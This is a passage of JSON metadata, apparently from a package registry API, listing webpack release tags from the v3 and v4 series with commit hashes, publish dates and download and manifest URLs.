webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp